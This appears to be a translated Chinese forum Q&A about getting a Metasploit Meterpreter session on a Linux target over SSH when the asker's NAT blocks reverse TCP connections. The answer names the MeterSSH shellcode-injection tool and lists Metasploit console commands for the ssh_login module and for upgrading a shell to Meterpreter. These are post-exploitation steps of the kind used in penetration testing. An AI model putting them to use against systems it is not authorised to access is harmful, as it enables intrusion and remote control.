ssh 连接上的 Meterpreter

ssh 连接上的 Meterpreter

我在 NAT 后面。

我可以通过 ssh 登录到目标。

如何使用metasploit/meterpreter通过 SSH 连接发送?

我尝试过shell_to_meterpreter但是失败了因为我无法打开我的端口用于反向 TCP 连接。

两台机器都运行 Linux。

答案1

视窗:

您可以尝试使用MeterSSH

MeterSSH 是一种将本机 shellcode 注入内存并通过 SSH 隧道将任何内容通过 SSH 传输到攻击者机器的简单方法,并且所有内容都包含在一个 Python 文件中。

Linux:

您可以使用 metasploit 的辅助模块 ssh_login:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.109  
msf auxiliary(ssh_login) > set username foo   
msf auxiliary(ssh_login) > set password bar
msf auxiliary(ssh_login) > exploit

现在通过以下命令将命令 shell 转换为 meterpreter shell

session –u 1

相关内容